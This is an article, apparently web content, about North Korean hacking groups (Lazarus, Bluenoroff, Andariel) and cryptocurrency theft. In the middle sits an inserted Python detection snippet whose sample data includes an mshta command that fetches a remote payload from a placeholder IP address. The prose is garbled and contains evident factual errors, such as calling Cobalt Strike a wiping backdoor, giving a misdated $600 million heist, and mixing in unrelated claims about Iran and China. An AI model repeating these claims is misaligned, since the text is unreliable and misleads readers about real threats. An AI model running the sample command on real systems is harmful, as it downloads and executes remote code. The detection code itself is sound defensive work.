Cryptocurrency is a digital form of currency that is created and stored using cryptographic keys and encryption algorithms. It lets people transact with one another without relying on an intermediary such as a bank.
Cybercriminals are increasingly taking advantage of cryptocurrency to commit criminal acts and cause harm. Illicit uses of cryptocurrency pose a grave danger to public safety and national security.
Lazarus Group
The Lazarus Group, also known as Hidden Cobra, has been active since 2009 and believed to be affiliated with the North Korean government. It has been responsible for numerous high-profile attacks such as Ronin's $600 million cryptocurrency heist and Harmony's Horizon Bridge hack.
Cisco Talos reports that the group has employed various techniques to compromise targets, such as credential harvesting tools and proxy services. It also uses reverse tunneling and auto-run services to maintain persistence on compromised servers.
In addition to energy providers, the group has also been observed conducting espionage against defense and governmental organizations as well as companies in the chemical sector. These activities appear to be aligned with North Korean government goals and objectives, according to a cybersecurity company.
Researchers recently identified a new campaign run by this group that resembles earlier efforts but has several notable differences. These include the use of bare IP addresses without domain names, an exploit for the Log4Shell vulnerability that creates reverse shells on compromised endpoints, and a C2 server that hosts the payload itself.
Though the payload in this new campaign is not groundbreaking, ASEC noted that it still proves effective and shows that the Lazarus Group has progressed from its previous strategies.
The Lazarus Group has a history of siphoning off large amounts of cryptocurrency, and was recently observed infecting cryptocurrency exchanges with malicious Windows and macOS applications that steal private keys and exploit security flaws in fraudulent transactions. Furthermore, these hackers have attempted to hack blockchain and cryptocurrency exchanges in an effort to circumvent sanctions, according to the research team.
Lazarus Group recently conducted a campaign that exposed several malware types, such as NukeSped (a remote access trojan, or RAT), Cobalt Strike (a backdoor with wiping capabilities) and DESTOVER (a backdoor with wiping capabilities). Furthermore, ASEC reported that this group has been working alongside Kimsuky (another hacking group associated with the North Korean government) for some time.
Due to these efforts, the South Korean government recently created a cybercrime taskforce with the purpose of safeguarding businesses against malicious actors such as Lazarus Group. Separately, MITRE ATT&CK maintains a threat matrix that categorizes the techniques and procedures adversaries use against their targets.
Bluenoroff
Kaspersky Labs released a report this week that identified Bluenoroff, an advanced persistent threat (APT) group associated with North Korea, as being behind sophisticated phishing and social engineering attacks against cryptocurrency startups worldwide. According to the report, Bluenoroff targets companies worldwide involved with smart contracts, DeFi, and blockchains.
Kaspersky reports that the hacking group has been targeting financial institutions and cryptocurrency exchanges, as well as small to medium-sized crypto businesses. To carry out these attacks, they use malicious documents and fake MetaMask browser extensions, according to Kaspersky's findings.
The APT group uses multiple infection chains and builds them according to the situation. It utilizes weaponized Word documents, Windows shortcut files, and zipped malware in order to spread malicious code. Furthermore, it possesses a PowerShell agent and a keylogger that monitor victim activity.
Additionally, it has been observed circumventing Microsoft Windows' Mark of the Web (MOTW) technology to deliver its malicious software more effectively. The group has been using obfuscated optical disk image (.iso extension) and virtual hard disk (.vhd extension) file formats, allowing it to bypass the MOTW warnings that typically appear when users open a file downloaded from the internet.
It has also been seen attempting to steal nonfungible tokens, or assets that cannot be converted into cash through traditional means. It has previously stolen hundreds of millions in cryptocurrency, including $600 million in March 2018.
Throughout its operation, the APT group used malicious e-mails and fake websites to target a range of organizations around the world. Furthermore, it employed an innovative heist technique that allowed it to inject funds into a company's account without leaving any trace behind.
This method involves altering an inbound transaction and inserting a new recipient address for it. Additionally, they have been seen targeting Society for Worldwide Interbank Financial Telecommunication (SWIFT) software to achieve this effect.
Through these actions, it was able to siphon off funds from companies around the world and use them for its operations. The group has been responsible for numerous attacks over recent years, such as hacking into Sony's system in 2014 and Bangladeshi central bank data in 2016.
Andariel
The South Korean Cybercrime Taskforce, led by the National Police Agency, is actively combatting crypto scams involving malware from North Korea. The team will draw on a variety of sources to detect threats and provide intelligence about cybercriminals.
Recently, Andariel has been identified as a group engaged in targeted cyberespionage and monetization. Their activities date back to at least 2015 and their targets include state, government and army organizations as well as financial service providers.
Andariel has been identified engaging in various cyberespionage attacks, such as watering hole attacks against South Korean websites and ActiveX zero-day exploits for intelligence gathering. Furthermore, Andariel appears to have employed customized ransomware in recent campaigns for financial gain, according to CISA and US-CERT.
Recently, Andariel has deployed DTrack and Maui ransomware against target networks in Japan, Russia, India, and Vietnam. Kaspersky researchers have linked these attacks to Andariel and were able to pinpoint their origins to April 2021.
At the start of the attack, Andariel uses a malicious access file that downloads and executes a remote payload using Mshta. After the payload completes execution, it encrypts all files on the infected device and demands payment in Bitcoin in exchange for restoring access to the victim's encrypted data.
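Two defender-side checks for the behaviours described above (Bluenoroff's MOTW bypass via ISO/VHD containers, and Andariel's use of Mshta to fetch a remote payload), written as an added example rather than code from any of the cited reports. The process-event log format, the sample lines and the Zone.Identifier stream contents are constructed for this example; the ZoneId values (3 = Internet, 4 = Restricted sites) are Windows' own.

```python
"""Detection helpers: mshta.exe launched with a remote payload, and a Mark-of-the-Web
gap where a file unpacked from an internet-zoned ISO/VHD carries no zone of its own."""
import re
from typing import Optional

REMOTE_URL = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
# Windows URL security zones that trigger MOTW warnings: 3 = Internet, 4 = Restricted sites.
UNTRUSTED_ZONES = {3, 4}


def parse_event(line: str) -> dict:
    """Parse a constructed key="value" process-creation record into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def is_mshta_remote_payload(event: dict) -> bool:
    """True when mshta.exe is started with an http(s) URL on its command line."""
    image = event.get("Image", "").lower()
    return image.endswith("mshta.exe") and REMOTE_URL.search(event.get("CommandLine", "")) is not None


def motw_zone(zone_identifier: Optional[str]) -> Optional[int]:
    """Return ZoneId from a Zone.Identifier stream's text, or None if the stream is absent."""
    if zone_identifier is None:
        return None
    match = re.search(r'^ZoneId=(\d+)', zone_identifier, re.MULTILINE)
    return int(match.group(1)) if match else None


def motw_gap(container_zone: Optional[str], inner_zone: Optional[str]) -> bool:
    """True when an untrusted container (a downloaded ISO/VHD) yields a file with no
    untrusted zone of its own, so the inner file opens without the usual warning."""
    return motw_zone(container_zone) in UNTRUSTED_ZONES and motw_zone(inner_zone) not in UNTRUSTED_ZONES


# Constructed sample events; 203.0.113.10 is a documentation address, not a real indicator.
SAMPLE_EVENTS = [
    'Image="C:\\Windows\\System32\\mshta.exe" CommandLine="mshta.exe http://203.0.113.10/update.hta" ParentImage="C:\\Windows\\explorer.exe"',
    'Image="C:\\Windows\\System32\\mshta.exe" CommandLine="mshta.exe C:\\Users\\a\\local.hta" ParentImage="C:\\Windows\\explorer.exe"',
    'Image="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" CommandLine="winword.exe /n" ParentImage="C:\\Windows\\explorer.exe"',
]
# Constructed Zone.Identifier stream as written for a file saved from a browser (Internet zone).
ISO_ZONE = "[ZoneTransfer]\r\nZoneId=3\r\n"


def scan_events() -> list:
    """Return the command lines of events that match the mshta remote-payload check."""
    return [parse_event(l)["CommandLine"] for l in SAMPLE_EVENTS if is_mshta_remote_payload(parse_event(l))]


if __name__ == "__main__":
    print(scan_events())           # only the http:// launch is flagged
    print(motw_gap(ISO_ZONE, None))  # True: container is Internet-zoned, extracted file has no stream
```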
Another distinguishing characteristic of this malware is its use of MagicRAT, a remote access trojan (RAT) created by North Korean nation-state actors that has been observed in several recent incidents. While RATs can monitor networks and deliver malicious content to victims, Cisco Talos describes MagicRAT's capabilities as more advanced than those of other RATs.
Besides this, Andariel's infection process involves several additional steps. These include downloading and saving various stages of the malware, executing code, and exfiltrating a payload. Furthermore, Andariel utilizes 3Proxy, an open proxy server utility which can be used to access internal resources within a victim network. This tool has been observed in previous campaigns by Andariel and is believed to be part of their malware infection strategy.
North Korea
North Korea boasts a nuclear arsenal that could easily target the United States and its allies. Pyongyang has tested nuclear weapons six times, as well as developing ballistic missiles capable of reaching Japan or South Korea.
As the United States and its allies continue to impose sanctions on Pyongyang, its cyber activities have become an increasingly significant source of income for its weapons programme. A 2020 US military report estimates that Pyongyang's cyber unit now numbers over 6,000 personnel.
North Korea is developing a range of offensive capabilities in addition to its nuclear arsenal, such as ballistic missiles and long-range land attack cruise missiles. According to a 2023 US military report, these weapons can reach targets across the Pacific Ocean and East China Sea.
These weapons could be used to wreak destruction on South Korea and its infrastructure, as well as pose a potential security risk for the United States. Despite economic and diplomatic sanctions placed upon Pyongyang by the United States and its allies, Pyongyang continues to develop offensive capabilities in an effort to maintain control of the Korean peninsula.
North Korea has also been developing a large stockpile of fissile material, which it could potentially use to construct nuclear bombs. According to the Bulletin of the Atomic Scientists, they estimate they possess enough material for forty to fifty nuclear bombs.
Rumours persist that China's regime is working on a miniaturised nuclear bomb, which could be attached to a small missile. If successful, this would enable them to mass produce tactical nuclear weapons with which they could attack South Korea with ease.
The United States and its allies have imposed sanctions on Iran for its nuclear weapons program, yet it has continued to develop cyber capabilities, such as cybertheft of money from financial organizations and cryptocurrency exchanges.
Although the exact amount of money North Korea has stolen through cybertheft remains uncertain, a UN report estimates that they have amassed over $2 billion through this illicit activity as of 2019.
Cryptocurrency heists have proven to be one of the most lucrative forms of cybercrime for North Korea. A UN report estimates that their regime has stolen an impressive $250 million worth in virtual currencies through heists so far this year alone.